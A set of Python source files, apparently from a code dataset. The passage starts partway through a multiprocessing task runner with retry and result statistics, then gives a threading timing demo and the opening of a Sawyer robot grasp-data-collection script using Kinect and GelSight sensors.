                    x['kw'] = func_change(x)
                fails.append(x)
            if not fails:
                # BUGFIX: the message has no placeholders, so the previous
                # .format(len(fails), i) arguments were silently ignored.
                self.log.info('There is no failed result need to be retried.\n')
                break
            self.func_kws_now = [x['kw'] for x in fails[:]]
            self.log.info('*** Retry {} failed tasks in {} times !!! ***\n'.format(len(fails), i))
            try_start_time = time.time()
            is_ok, _results = self.run_real(*args, **kwargs)
            assert is_ok, _results
            # Missed results lack 'order_out'; renumber retried ones after the
            # last known order_out.
            order_out_last = max([x.get('order_out', 0) for x in results])
            for j, x in enumerate(_results):
                d = {'retry': i}
                d.update({k: v for k, v in x.items() if k in ['is_ok', 'result', 'timer', 'kw']})
                fails[j].update(d)
                if 'order_out' not in fails[j] and 'order_out' in x:  # the job may have missed again during the retry
                    fails[j]['order_out'] = x['order_out'] + order_out_last
            retry_time = round(time.time() - try_start_time, 2)
            self.cache['timer_retry'].append(retry_time)
        if mrun_save:
            dump_data(results, result_path)
        self.results = results
        self.cache['timer_mrun'] = round(time.time() - self.cache['start_time'], 2)
        self.show_miss()
        self.stat_results(results)
        if show_stats:
            self.show_results()
        return is_ok, results
    def run_real(self, inline=False, process_timeout=None):
        '''
        Run one pass over self.func_kws_now, multi-process or inline.

        :param process_timeout: per-process join timeout in seconds
        :param inline: run in the current process instead of spawning workers
        :return: (True, results); each result dict looks like
            {
                'is_ok': False,
                'miss': True,
                'result': 'result is not exist.',
                'order_in': n,
                'order_out': n,
                'kw': {}
            }
        '''
        if not inline:
            m = Manager()
            self.q_input = m.Queue()
            self.q_output = m.Queue()
            self.timer = m.dict()
        else:
            self.q_input = []
            self.q_output = []
            self.timer = {}
        assert isinstance(self.func_kws_now, list), 'func_kws is not list.'
        # Jobs are keyed by id(kw) so outputs can be matched back to inputs.
        idxes = OrderedDict()
        for i, kw in enumerate(self.func_kws_now, 1):
            idx = id(kw)
            kw.update(self.func_common_kw)
            d = {'order_in': i, 'idx': idx, 'kw': kw}
            idxes[idx] = d
            if not inline:
                self.q_input.put(d)
            else:
                self.q_input.append(d)
        if inline:
            self.job(1, inline=True)
        else:
            process_num = min(self.default('process_num'), len(self.func_kws_now))
            self.cache['process_num_use'] = process_num
            self.show_debug('start {} process.'.format(process_num))
            ps = []
            for process_i in range(1, process_num + 1):
                process = Process(target=self.job, args=([process_i, False]))
                ps.append(process)
                process.start()
            for i, p in enumerate(ps):
                p.join(timeout=process_timeout)
            if process_timeout:
                # Kill any worker that outlived its join timeout.
                for i, p in enumerate(ps, 1):
                    if p.is_alive():
                        self.show_process_debug('terminate process {}.'.format(i))
                        p.terminate()
        outputs = {}
        if not inline:
            for i in range(1, self.q_output.qsize() + 1):
                d = self.q_output.get_nowait()
                d['order_out'] = i
                outputs[d['idx']] = d
        else:
            for i, d in enumerate(self.q_output):
                d['order_out'] = i + 1
                outputs[d['idx']] = d
        results = []
        now = time.time()
        for idx, d in idxes.items():
            if idx in outputs:
                results.append(outputs[idx])
            else:
                # The job produced no output (crash or timeout): synthesize a
                # "miss" record so callers still see one result per job.
                d1 = {'is_ok': False,
                      'miss': True,
                      'result': 'result is not exist.',
                      'order_in': d['order_in'],
                      'kw': d['kw'],
                      'timer': round((now - self.timer[idx]) if self.timer.get(idx) else 9999, 2),
                      }
                results.append(d1)
        return True, results
    def show_process_debug(self, *obj):
        """ Emit debug output only when show_process is enabled. """
        self.show_by_flag(self.default('show_process'), *obj)
    def show_miss(self):
        """ Log every job that never produced a result. """
        for i, x in enumerate(self.results):
            if x.get('miss'):
                # NOTE(review): other methods log via self.log.*; confirm that
                # MyClass actually provides a log_error() helper.
                self.log_error('miss result. {}'.format(x['kw']))
    def stat_results(self, results):
        """ Fill self.stat with counts and slowest-first timing rankings. """
        for x in results:
            if x.get('miss'):
                self.stat['miss'] += 1
                continue
            if x['is_ok']:
                self.stat['success'] += 1
            else:
                self.stat['fail'] += 1
        ranked = [{'id': i, 'timer': x['timer'], 'miss': x.get('miss'), 'is_ok': x['is_ok']} for i, x in enumerate(results)]
        ranked.sort(key=lambda v: v['timer'], reverse=True)
        self.stat['timer'].update({'top': [x['id'] for x in ranked],
                                   'top_success': [x['id'] for x in ranked if x['is_ok']],
                                   'top_fail': [x['id'] for x in ranked if not x.get('miss') and not x['is_ok']],
                                   'top_miss': [x['id'] for x in ranked if x.get('miss')]})
    def stat_results1(self, results):
        """ Alternative statistics: track only the extreme timings per class. """
        timer_max = None
        timer_min = None
        timer_max_miss = None
        timer_max_fail = None
        for x in results:
            if x.get('miss'):
                self.stat['miss'] += 1
                if not timer_max_miss or x['timer'] > timer_max_miss['timer']:
                    timer_max_miss = x
                continue
            if x['is_ok']:
                self.stat['success'] += 1
                if not timer_max or x['timer'] > timer_max['timer']:
                    timer_max = x
                if not timer_min or x['timer'] < timer_min['timer']:
                    timer_min = x
            else:
                self.stat['fail'] += 1
                if not timer_max_fail or x['timer'] > timer_max_fail['timer']:
                    timer_max_fail = x
        self.stat['timer'].update({'timer_max': timer_max, 'timer_min': timer_min, 'timer_max_miss': timer_max_miss,
                                   'timer_max_fail': timer_max_fail})
    def show_results(self):
        """ Log the one-line run summary (counts, duration, retries). """
        msg = 'Total: {total}, Success: {success}, Fail: {fail}, Miss: {miss}. '.format(**self.stat)
        msg += 'Duration: {timer_mrun}s, Process: {process_num}, Timeout: {process_timeout}, Inline: {inline}.'.format(
            **self.cache, **self.control)
        if self.cache['timer_retry']:
            msg += ', including '
            l = []
            for i, x in enumerate(self.cache['timer_retry']):
                l.append('retry{}: {}s'.format(i + 1, x))
            msg += ', '.join(l)
            if l:
                msg += '.'
        self.log.info(msg)
    def update_results(self, model, key, datas=None, sql=None, last_cols=None, timed=True, ret_str=True):
        '''
        Write run results into a result table.

        :param model: result table (a MyModel instance, or a model to wrap)
        :param datas: result rows; defaults to self.results
        :param key: primary-key column name, or a callable extracting the key
            from a row
        :param sql: optional query for existing rows; defaults to a full query
        :param last_cols: [col1, col2] columns whose previous values should be
            preserved; the model must have matching col1_last/col2_last columns
        :param timed: record the update time
        :param ret_str:
        :return: (is_ok, result)
        '''
        # NOTE(review): the exact-class comparison excludes MyModel subclasses;
        # confirm whether isinstance() was intended.
        if model.__class__ == MyModel:
            mm = model
        else:
            mm = MyModel(model, db_session=self.db_session)
        if not datas:
            datas = self.results
        if not last_cols:
            # Infer the "_last" columns from the model schema.
            last_cols = [col.replace('_last', '') for col in mm.cols_name if col.endswith('_last')]
        if sql:
            is_ok, data_old = mm.query(sql=sql, key=key)
        else:
            is_ok, data_old = mm.query(key=key)
        for i, v in enumerate(datas):
            k = key(v) if hasattr(key, '__call__') else v[key]
            if k in data_old:
                # Carry the previous value of every tracked column into *_last.
                _keys = list(v.keys())
                for col in _keys:
                    if col not in mm.cols_name:
                        continue
                    if col in last_cols:
                        v['{}_last'.format(col)] = data_old[k][col]
            count_fail_col = 'failed'
            if 'is_ok' in v and count_fail_col in mm.cols_name:
                # Maintain a cumulative failure counter per row.
                if k in data_old:
                    _count = data_old[k][count_fail_col]
                    if not _count:
                        _count = 0
                else:
                    _count = 0
                if not v['is_ok']:
                    v[count_fail_col] = _count + 1
                else:
                    v[count_fail_col] = _count
            if 'is_ok' in v:
                # Normalize the boolean to 0/1 for storage.
                v['is_ok'] = 1 if v['is_ok'] else 0
        is_ok, result = mm.update(data_new=datas, data_old=data_old, key=key, timed=timed, ret_str=ret_str)
        return is_ok, result
class MrunArgParse(ArgParseClass):
    # Argument parser pre-loaded with the multi-process command-line options
    # consumed by MultiRun.run() (process count, timeout, retry flags, ...).
    def __init__(self, process_num=60, process_timeout=60, *args, **kwargs):
        # Remember the defaults applied when add_multi() gets no overrides.
        ArgParseClass.__init__(self, *args, **kwargs)
        self.process_num = process_num
        self.process_timeout = process_timeout
    def add_multi(self, group='Multi Process', process_num=None, process_timeout=None):
        # Register the shared multi-process options under the given group.
        self.add('--process_num', type=int, default=process_num or self.process_num,
                 help='进程数量,{}'.format(process_num or self.process_num),
                 group=group)
        self.add('--process_timeout', type=int, default=process_timeout or self.process_timeout,
                 help='进程超时时间, default {}s'.format(process_timeout or self.process_timeout), group=group)
        self.add('--inline', action='store_true', default=False, help='串行模式', group=group)
        self.add('--show_process', action='store_true', default=False, help='显示进程操作过程', group=group)
        self.add('--retry_fail', type=int, default=0, help='重试失败次数,默认0', group=group)
        self.add('--load_fail_result', action='store_true', default=False, help='载入原先失败的结果', group=group)
        self.add('--mrun_load', action='store_true', default=False, help='载入原先的结果', group=group)
    # def add_all(self):
    #     self.add_base(self)
    #     self.add_multi()
if __name__ == '__main__':
    # Smoke test: 5 jobs that each sleep 0-3 s, spread over 3 processes.
    def test(i):
        # must return is_ok, message
        t = randint(0, 3)
        time.sleep(t)
        msg = 'i am {}, waiting {}.'.format(i, t)
        print(msg)
        return True, msg
    mr = MultiRun(func=test, func_kws=[{'i': x} for x in range(5)], process_num=3,
                  add_log_to_common_kw=True)
    print(mr.run(inline=False))
|
io_bound_threading.py | import time
import threading
def io_bound_job(job_id, num_requests):
    """Simulate an IO-bound task: sleep 3 s per request, printing timing info."""
    began = time.time()
    print(f"IO-bound sub-job {job_id} started.")
    remaining = num_requests
    while remaining > 0:
        # Each simulated request is dominated by waiting, like a network call.
        time.sleep(3)
        remaining -= 1
    duration = time.time() - began
    print(f"IO-bound sub-job {job_id} finished in {duration:.2f} seconds.")
def run_with_threads(n_jobs, num_requests_per_job):
    """Start n_jobs io_bound_job workers concurrently and wait for them all."""
    workers = []
    for worker_id in range(n_jobs):
        t = threading.Thread(target=io_bound_job, args=(worker_id, num_requests_per_job))
        workers.append(t)
        t.start()
    # Block until every worker has finished.
    for t in workers:
        t.join()
# Demo: the total simulated work is 9 s of sleeping either way; with three
# threads the waits overlap, so wall-clock time drops from ~9 s to ~3 s.
start_one_thread = time.time()
# Run with a single thread:
run_with_threads(n_jobs=1, num_requests_per_job=3)
duration = time.time() - start_one_thread
print(f"IO-bound job finished in {duration:.2f} seconds with a single thread.")
start_three_threads = time.time()
# Run with three threads:
run_with_threads(n_jobs=3, num_requests_per_job=1)
duration = time.time() - start_three_threads
print(f"IO-bound job finished in {duration:.2f} seconds with three threads.")
# Expected output:
# IO-bound sub-job 0 started.
# IO-bound sub-job 0 finished in 9.01 seconds.
# IO-bound job finished in 9.01 seconds with a single thread.
# IO-bound sub-job 0 started.
# IO-bound sub-job 1 started.
# IO-bound sub-job 2 started.
# IO-bound sub-job 0 finished in 3.00 seconds.
# IO-bound sub-job 1 finished in 3.00 seconds.
# IO-bound sub-job 2 finished in 3.00 seconds.
# IO-bound job finished in 3.00 seconds with three threads.
|
run_experiment_nordri_torque_control.py | #!/usr/bin/env python
import grip_and_record.inverse_kin
from geometry_msgs.msg import (
PoseStamped,
Pose,
Point,
Quaternion,
)
from data_recorder_and_torque_controller import DataRecorder_TorqueController as DR_TC
import data_recorder_and_torque_controller as dr
from grip_and_record.robot_utils import Orientations
import rospy
import intera_interface
from intera_interface import CHECK_VERSION
from intera_interface import (
Gripper,
Lights,
Cuff,
RobotParams,
)
import numpy as np
from transform import transform
import time
import grip_and_record.getch
import grip_and_record.locate_cylinder
import os
import matplotlib.pyplot as plt
from KinectA import KinectA
from KinectB import KinectB
import logging
import threading
from GelSightA import GelSightA
from GelSightB import GelSightB
import WSG50_manu
import tensorflow_model_is_gripping.press as press
import pylab
import cv2
import time
import random
import multiprocessing
import tensorflow_model_is_gripping.aolib.util as ut
from sensor_msgs.msg import JointState
# Root logger: DEBUG level, echoed both to the console and to a log file in
# the current working directory.
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
# To log file
fh = logging.FileHandler('run_experiment.log')
fh.setLevel(logging.DEBUG)
logger.addHandler(fh)
__version__ = '1.0.1'
# Parameters experiment
###############################
COMPUTE_BG = False # Store a new background image
save_parallel = False
bounds_table = np.array([[0.45, 0.65], [-0.25, 0.25]]) # X(min, max), Y(min, max) # TODO: this is too small!!!
grasping_force = [4, 25] # min, max of the force [N] applied by the gripper when trying to grasp the object # max = 25
time_waiting_in_air = 4 # Number of seconds the object is held in the air to determine if the grasp is stable.
xyz_bias = [0.005, -0.01, 0] # bias to compensate for kinect-sawyer calibration inaccuracies
###############################
# Parameters Gripper
###############################
# Gelsight adaptor v1
# lower_bound_z = 0.21 # When using the v1 of the weiss_gelsight_adaptor (the short one, with large grasp)
# height_gripper = 0.08 # v1 of the weiss_gelsight_adaptor
# Gelsight adaptor v2
lower_bound_z = 0.242 # When using the v2 of the weiss_gelsight_adaptor (the tall one, with smaller grasp)
height_gripper = 0.11 # v2 of the weiss_gelsight_adaptor
###############################
# Pick the name of the object #
###############################
# name = 'peptobismol'
# name = 'soda_can'
# name = 'purple_meausure_1_cup'
# name = 'green_plastic_cup'
# name = "soft_red_cube"
# name = "soft_elephant"
# name = "soft_zebra"
# name = "blue_cup"
# name = "wooden_pyramid"
# name = "french_dip"
# name = "red_bull"
# name = "metal_can"
# name = "spam"
# name = "soft_blue_cylinder"
# name = "wooden_cube"
# name = "soda_can"
# name = "rubics_cube"
# name = "plastic_duck"
# name = "glass_candle_holder"
# name = "black_metallic_candle_cage"
# name = "aspirin"
# name = "ponds_dry_skin_cream"
# name = "edge_shave_gel"
# name = "ogx_shampoo"
# name = "isopropyl_alcohol"
# name = "baby_cup" # form IKEA
# name = "kong_dog_toy"
# name = "dark_blue_sphere"
# name = "bandaid_box"
# name = "angry_bird"
# name = "hand_soap" # cylinder-fitting fails
# name = "plastic_whale"
name = "plastic_cow"
# name = "monster_truck"
# name = "plastic_mushroom"
# name = "mesh_container" #-> basket?
# name = "bag_pack" #-> forslutas (?)
# name = "chocolate_shake"
# name = "brown_paper_cup"
# name = "brown_paper_cup_2_upside" # Two stacked
# name = "toy_person_with_hat" # bad, too small
# name = "webcam_box"
# name = "playdoh_container"
# name = "pig"
# name = "stuffed_beachball"
# name = "tuna_can"
# name = "bottom_of_black_metallic_candle_cage" # fails
# name = "metal_cylinder_with_holes"
# name = "set_small_plastic_men_yellow_construction_worker"
# name = "wiry_sphere"
# name = "translucent_turquoise_cup" # cylinder-fitting overestimates size (maybe due to translucency)
# name = "green_and_black_sphere"
# name = "blue_translucent_glass_cup" #cylinder-fitting totally failed here
# name = "plastic_sheep"
# name = 'feathered_ball'
# name = "plastic_chicken"
# name = 'blueish_plastic_cup'
# name = "set_small_plastic_men_police_man"
# name = "set_small_plastic_men_red_racer"
# name = "set_small_plastic_men_blue_guy"
# name = "set_small_plastic_men_green_guy"
# name = 'orange_plastic_castle' # -> from the toy box in the cabinet
# name = 'pink_glass_glass' # the one painted by roberto
# name = 'blue_painted_glass'
# name = 'soft_blue_hexagon'
# name = "egg_crate_foam"
# name = "dog_toy_ice_cream_cone"
# name = "onion"
# name = "axe_body_spray"
# name = "candle_in_glass"
# name = "tomato_paste_in_metal_can"
# name = "small_coffe_cup" # <- ideal caffe stagnitta
# name = "yellow_wooden_robot"
# name = "international_travel_adapter"
# name = "lemon"
# name = "muffin"
# name = "lime"
# name = "potato"
# name = "red_apple"
# name = '3d_printed_blue_connector'
# name = 'board_eraser'
# name = 'peppermint_altoids_box'
# name = 'durabuilt_measuring_tape'
# name = "moroccan_mint_tea_box"
# name = "pink_blue_coke_bottle"
# name = "emergency_stop_button_for_sawyer"
# name = 'froot_loops'
# name = 'pino_silvestre' # -> green glass parfume
# name = 'monofilament_line'
# name = 'plastic_watering_can'
# name = 'red_turtle'
# name = '3d_printed_blue_house'
# name = '3d_printed_blue_vase'
# name = '3d_printed_black_cylinder_gear'
# name = "3d_printed_white_ball"
# name = "black_plastic_half_cylinder"
# name = "white_mini_american_hat"
# name = "logitech_wireless_mouse"
# name = "purple_small_plastic_fruit"
# name = "cinnamon"
# name = 'calcium_antacid'
# Best objects:
# brown_paper_cup_2_upside
def init_robot(limb_name):
    """Initialize the ROS node, enable the Sawyer robot and return the limb.

    :param limb_name: name of the limb to control (must be one of the names
        reported by ``RobotParams.get_limb_names()``).
    :return: an enabled ``intera_interface.Limb`` moved to the rest pose, or
        ``None`` if no limbs are detected or *limb_name* is invalid.
    """
    rp = intera_interface.RobotParams()
    valid_limbs = rp.get_limb_names()
    if not valid_limbs:
        rp.log_message(("Cannot detect any limb parameters on this robot. "
                        "Exiting."), "ERROR")
        return
    rp.log_message('Initializing node... ')
    rospy.init_node("move_and_grip")
    rp.log_message('Getting robot state... ')
    rs = intera_interface.RobotEnable(CHECK_VERSION)
    init_state = rs.state().enabled

    def clean_shutdown():
        # Restore the robot's original enablement state when the node exits.
        print("\nExiting example.")
        if not init_state:
            rp.log_message('Disabling robot...')
            rs.disable()
    rospy.on_shutdown(clean_shutdown)

    rospy.loginfo("Enabling robot...")
    rs.enable()

    if limb_name not in valid_limbs:
        # Fixed: the original message always said "Right" regardless of the
        # limb actually requested.
        rp.log_message(("{0} is not a valid limb on this robot. "
                        "Exiting.").format(limb_name), "ERROR")
        return
    limb = intera_interface.Limb(limb_name)
    limb.set_joint_position_speed(0.25)
    goto_rest_pos(limb)
    return limb
def init_gripper():
    """Construct and return the WSG-50 gripper interface (project driver)."""
    return WSG50_manu.WSG50()
def wait_for_key():
    """Block until the user presses ESC (or Ctrl-C) or ROS shuts down."""
    params = intera_interface.RobotParams()  # For logging
    params.log_message("Press ESC to continue...")
    while not rospy.is_shutdown():
        key = grip_and_record.getch.getch()
        # '\x1b' is ESC, '\x03' is Ctrl-C; anything else keeps waiting.
        if key and key in ['\x1b', '\x03']:
            break
def goto_rest_pos(limb, joint_pos_publisher=None, torque=False, speed=0.1):
    """Move the end-effector to the fixed rest pose above the table.

    :param limb: ``intera_interface.Limb`` to move.
    :param joint_pos_publisher: publisher for desired joint states; forwarded
        to ``goto_EE_xyz`` and only used when ``torque`` is True.
    :param torque: if True, stream interpolated targets via ``goto_EE_xyz``
        (``rest_pos=True`` skips the workspace bounds checks); otherwise do a
        single IK solve followed by a blocking joint-position move.
    :param speed: speed argument forwarded to ``goto_EE_xyz``.
    """
    orientation = Orientations.DOWNWARD_ROTATED
    # Fixed rest position in Sawyer base coordinates [m].
    xyz_rest = np.array([0.50, 0.50, 0.60])
    if torque:
        goto_EE_xyz(limb=limb, joint_pos_publisher=joint_pos_publisher, goal_xyz=xyz_rest, goal_orientation=orientation,
                    speed=speed, rest_pos=True)
    else:
        des_pose = grip_and_record.inverse_kin.get_pose(xyz_rest[0], xyz_rest[1], xyz_rest[2], orientation)
        curr_pos = limb.joint_angles()  # Measure current position
        joint_positions = grip_and_record.inverse_kin.get_joint_angles(des_pose, limb.name, curr_pos,
                                                                       use_advanced_options=True)  # gets joint positions
        limb.move_to_joint_positions(joint_positions)  # Send the command to the arm
def goto_EE_xyz(limb, joint_pos_publisher, goal_xyz, goal_orientation, speed=0.1, rest_pos=False):
    """Linearly interpolate the end-effector from its current pose to *goal_xyz*.

    Publishes IK-derived joint targets on *joint_pos_publisher* at each of the
    interpolation points, pacing them so the whole move takes roughly
    distance/speed seconds.

    :param limb: ``intera_interface.Limb`` being controlled.
    :param joint_pos_publisher: ``rospy.Publisher`` of ``JointState`` targets.
    :param goal_xyz: target XYZ position (indexable, length 3).
    :param goal_orientation: target orientation quaternion (kept constant
        along the path; the commented-out lines show an abandoned attempt to
        also interpolate the orientation).
    :param speed: nominal Cartesian speed used to derive the total move time.
    :param rest_pos: when True, skip the workspace bounds assertions (used for
        the rest pose, which lies outside the sampling bounds).
    """
    rp = intera_interface.RobotParams()  # For logging
    rp.log_message('Moving to x=%f y=%f z=%f' % (goal_xyz[0], goal_xyz[1], goal_xyz[2]))
    if not rest_pos:
        # Make sure that the XYZ position is valid, and doesn't collide with the cage
        assert (goal_xyz[0] >= bounds_table[0, 0]) and (goal_xyz[0] <= bounds_table[0, 1]), 'X is outside of the bounds'
        assert (goal_xyz[1] >= bounds_table[1, 0]) and (goal_xyz[1] <= bounds_table[1, 1]), 'Y is outside of the bounds'
        assert (goal_xyz[2] >= lower_bound_z), 'Z is outside of the bounds'
    number_of_interpolation_points = 20  # min is 2
    frac = np.linspace(start=0, stop=1, num=number_of_interpolation_points)
    start_pos = limb.endpoint_pose()
    start_xyz = np.array([start_pos["position"].x, start_pos["position"].y, start_pos["position"].z])
    start_angle = start_pos["orientation"].y
    # dist = np.linalg.norm(goal_xyz - start_xyz) + np.abs(goal_orientation.y - start_angle) + 0.001
    # Small constant keeps total_time > 0 even for a zero-length move.
    dist = np.linalg.norm(goal_xyz - start_xyz) + 0.01
    total_time = dist / float(speed)
    start_time = time.time()
    js = JointState()
    js.name = limb.joint_names()
    for alpha in frac:
        time_elapsed = time.time() - start_time
        # Waypoint: convex combination of start and goal positions.
        dest_xyz = start_xyz * (1 - alpha) + goal_xyz * alpha
        # dest_angle = start_angle * (1 - alpha) + goal_orientation.y * alpha
        # dest_orientation = orientation_downward(dest_angle)
        des_pose = grip_and_record.inverse_kin.get_pose(dest_xyz[0], dest_xyz[1], dest_xyz[2], goal_orientation)
        seed = limb.joint_angles()  # Measure current position
        des_joint_positions = grip_and_record.inverse_kin.get_joint_angles(des_pose, limb.name, seed,
                                                                           use_advanced_options=True)  # gets joint positions
        js.position = [des_joint_positions[n] for n in js.name]
        joint_pos_publisher.publish(js)
        # Sleep only if we're ahead of schedule for this waypoint.
        if time_elapsed < alpha * total_time:
            time.sleep(alpha * total_time - time_elapsed)
def grasp_object(gripper, data_recorder):
    """
    Close the gripper to grasp an object, up to the desired grasping force.

    The force is drawn uniformly from the module-level ``grasping_force``
    range and logged to *data_recorder* before the grasp is commanded.

    :param gripper: WSG-50 gripper interface (``set_force``,
        ``graspmove_nopending``).
    :param data_recorder: recorder object used to log the commanded force.
    :return: None
    """
    force = random.randint(grasping_force[0], grasping_force[1])
    data_recorder.set_set_gripping_force(force)
    print("Setting gripping force:", force)
    gripper.set_force(force)
    # Close towards a 5 mm opening at 50 mm/s without blocking on completion.
    gripper.graspmove_nopending(width=5, speed=50)
    # Give the fingers time to make contact before the caller reads sensors.
    time.sleep(2)
def orientation_downward(angle):
    """
    Return the quaternion for a downward-facing gripper orientation.
    :param angle: rotation about the vertical axis [rad]
    :return: Quaternion with the angle encoded in the y component
    """
    # Gripper orientation is symmetric, so any angle maps into [0, +pi).
    wrapped = np.remainder(angle, np.pi)
    return Quaternion(x=1, y=wrapped, z=0, w=0)
def sample_from_cylinder(xy, height_object=0.25, radius=0.1):
    """
    Randomly sample a grasping position from a cylinder
    :param xy: x,y coordinates of the base/center of the cylinder
    :param height_object: height of the cylinder
    :param radius: radius of the cylinder
    :return: tuple (xyz, orientation): sampled end-effector position and a
        downward-facing orientation with a random rotation

    NOTE(review): ``approach`` is hard-coded to 2, so the approach-1 branch is
    dead code; it also overwrites its computed ``angle_gripper`` with 0 just
    before use. Relies on module-level ``height_gripper``, ``lower_bound_z``
    and ``xyz_bias`` — confirm these are defined in the full file.
    """
    approach = 2
    xy = np.array(xy)
    # TODO: assert things are the right dimension
    if approach == 1:
        # Approach 1: sample two points from the circumference, and the grasp is the line connecting them
        angles = np.random.uniform(0, 2 * np.pi, 2)  # sample 2 points in terms of angles [rad]
        xy_points = xy + [radius * np.sin(angles), radius * np.cos(angles)]  # convert them to xy position
        # compute line between points and corresponding EE position
        des_xy = np.sum(xy_points, 0) / 2  # Middle point
        angle_gripper = np.pi / 2 + (np.pi - (angles[1] - angles[0]) / 2) + angles[
            0]  # TODO: compute angle gripper y = ax + b
        # rp.log_message('Moving to x=%f y=%f z=%f' % (des_xy[0], des[1], xyz[2]))
        angle_gripper = 0
        orientation = orientation_downward(angle=angle_gripper)
        xyz = np.array([des_xy[0], des_xy[1], 0.25])  # fix height
    if approach == 2:
        # Approach 2: directly sample angle and shift
        xy_noise = 0.001
        shift = np.random.uniform(low=-xy_noise, high=xy_noise, size=3)
        shift_z_min = np.maximum(0.01, height_object - height_gripper)  # make sure that we don't hit with the gripper
        shift_z_max = height_object - 0.015  # small bias to avoid grasping air
        shift[2] = np.random.uniform(low=shift_z_min, high=shift_z_max)
        shift[2] = np.maximum(0, shift[2])  # Just for safety
        # print('Z = [%f,%f] => %f' %(shift_z_min, shift_z_max, shift[2]))
        xyz = np.array([xy[0], xy[1], lower_bound_z]) + shift + xyz_bias
        orientation = orientation_downward(angle=np.random.uniform(0, np.pi))
    return xyz, orientation
def main():
    """Main grasping data-collection loop.

    Repeatedly: locate the object on the table with KinectA (cylinder fit),
    grasp it with a randomized pose and force, record Kinect/GelSight/gripper
    data, classify grasp success from GelSight image pairs with a TensorFlow
    classifier, and drop the object back at a random table location.

    Relies on module-level globals (``name``, ``bounds_table``,
    ``lower_bound_z``, ``COMPUTE_BG``, ``save_parallel``,
    ``time_waiting_in_air``, ...) and loops until the ROS node is shut down
    externally — ``run`` is never set to False inside the loop.
    """
    print('Make sure the correct object is printed below.')
    print('Object: %s' % name)
    rp = intera_interface.RobotParams()  # For logging
    rp.log_message('')
    rp.log_message('Launch topics for gripper')
    rp.log_message('Please run the following command in a new terminal:')
    rp.log_message('roslaunch wsg_50_driver wsg_50_tcp_script.launch')
    rp.log_message('')
    # Requesting to start topics for KinectA
    rp.log_message('Launch topics for KinectA')
    rp.log_message('Please run the following command in a new terminal (in intera mode):')
    rp.log_message('rosrun kinect2_bridge kinect2_bridge')
    rp.log_message('')
    # Requesting to start topics for KinectB
    rp.log_message('Launch topics for KinectB')
    rp.log_message('Please run the following command in a new terminal (in intera mode) on the kinectbox02:')
    # rp.log_message('ssh k2')
    # rp.log_message('for pid in $(ps -ef | grep "kinect2_bridge" | awk "{print $2}"); do kill -9 $pid; done')
    rp.log_message('/home/rail/ros_ws/src/manu_kinect/start_KinectB.sh')
    rp.log_message('')
    # Start Topic for the Gelsights
    rp.log_message('Launch topic for GelsightA')
    rp.log_message('Please run the following command in a new terminal (in intera mode):')
    rp.log_message('roslaunch manu_sawyer gelsightA_driver.launch')
    rp.log_message('')
    rp.log_message('Launch topic for GelsightB')
    rp.log_message('Please run the following command in a new terminal (in intera mode):')
    rp.log_message('roslaunch manu_sawyer gelsightB_driver.launch')
    rp.log_message('')
    # Requests the user to place the object to be griped on the table.
    rp.log_message('Place the object to grasp on the table.')
    wait_for_key()
    # Make required initializations (robot, gripper, cameras, tactile sensors)
    limb_name = "right"
    limb = init_robot(limb_name=limb_name)
    gripper = init_gripper()
    gelSightA = GelSightA()
    gelSightB = GelSightB()
    kinectA = KinectA(save_init=COMPUTE_BG)
    kinectB = KinectB()
    time.sleep(1)
    # NOTE(review): the attribute access below assumes `multiprocessing` is
    # imported at module level; the `from`-import alone would not bind it.
    from multiprocessing.pool import ThreadPool
    pool = multiprocessing.pool.ThreadPool(processes=1)
    # Classifier for determining if gripper is gripping, using GelSight images.
    model_path = "/home/manu/ros_ws/src/manu_research/manu_sawyer/src/tensorflow_model_is_gripping/training/net.tf-4600"  # net.tf-2600
    net = press.NetClf(model_path, "/gpu:0")
    net.init()
    # NEW STUFF
    dr_tc = DR_TC(limb=limb, gripper=gripper, GelSightA=gelSightA, GelSightB=gelSightB, KinectA=kinectA,
                  KinectB=kinectB)
    thread = threading.Thread(target=dr_tc.attach_springs)
    thread.start()
    time.sleep(4)
    desired_joint_pos_publisher = rospy.Publisher('desired_joint_pos', JointState, queue_size=1)
    # Setup for main loop #
    # For plotting purposes
    Iter = 0
    fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2)
    # Whether to randomize gripper position and orientation or not when gripping the object
    randomize_gripper_position = True
    # Condition variable for the loop
    run = True
    #################
    # The main loop #
    #################
    comp_task = None
    while run:
        Iter += 1
        start_time = rospy.get_time()
        # Fit a cylinder around the object with the Kinect and get location, etc.
        rp.log_message('Waiting for Kinect to stabilize')
        time.sleep(0.5)
        rp.log_message('Done')
        xyz_kinect, height_object, radius, obj_vis = kinectA.calc_object_loc()
        # Initialize recording to file
        nameFile = time.strftime("%Y-%m-%d_%H%M%S")
        dr_tc.init_record(nameFile=nameFile)
        # Record cylinder data
        dr_tc.set_cylinder_data(xyz_kinect, height_object, radius)
        # Save the name of the object
        dr_tc.set_object_name(name)
        # Getting image from KinectB
        top_img = kinectB.get_color_image()
        top_img = cv2.cvtColor(top_img, cv2.COLOR_BGR2RGB)
        # Get image from GelSight
        # GelSightA
        gelA_img_r_ini = gelSightA.get_image()
        gelA_img_r_ini = cv2.cvtColor(gelA_img_r_ini, cv2.COLOR_BGR2RGB)
        # GelSightB
        gelB_img_r_ini = gelSightB.get_image()
        gelB_img_r_ini = cv2.cvtColor(gelB_img_r_ini, cv2.COLOR_BGR2RGB)
        # Plot result from Kinect for visualisation of fitted cylinder
        # Plot pic from GelSight
        if Iter == 1:
            kinA_img = ax1.imshow(obj_vis)
            kinB_img = ax2.imshow(top_img)
            gelA_img = ax3.imshow(gelA_img_r_ini)
            gelB_img = ax4.imshow(gelB_img_r_ini)
            ax1.axis('off')
            ax2.axis('off')
            ax3.axis('off')
            ax4.axis('off')
        else:
            kinA_img.set_data(obj_vis)
            kinB_img.set_data(top_img)
            gelA_img.set_data(gelA_img_r_ini)
            gelB_img.set_data(gelB_img_r_ini)
        plt.draw()
        plt.ion()
        plt.show()
        # Transform from Kinect coordinates to Sawyer coordinates
        xyz_sawyer = transform(xyz_kinect[0], xyz_kinect[1], xyz_kinect[2]).reshape(3)
        # If randomize_gripper_position is True, we grip the object with some randomness
        if randomize_gripper_position:
            # Sample randomized gripper position based on the fitted cylinder data
            des_EE_xyz, des_orientation_EE = sample_from_cylinder(xyz_sawyer[0:2], height_object, radius)
            des_EE_xyz_above = des_EE_xyz + np.array([0, 0, 0.18])
        else:
            des_orientation_EE = Orientations.DOWNWARD_ROTATED
            des_EE_xyz = xyz_sawyer
            des_EE_xyz[2] = lower_bound_z + height_object / 2
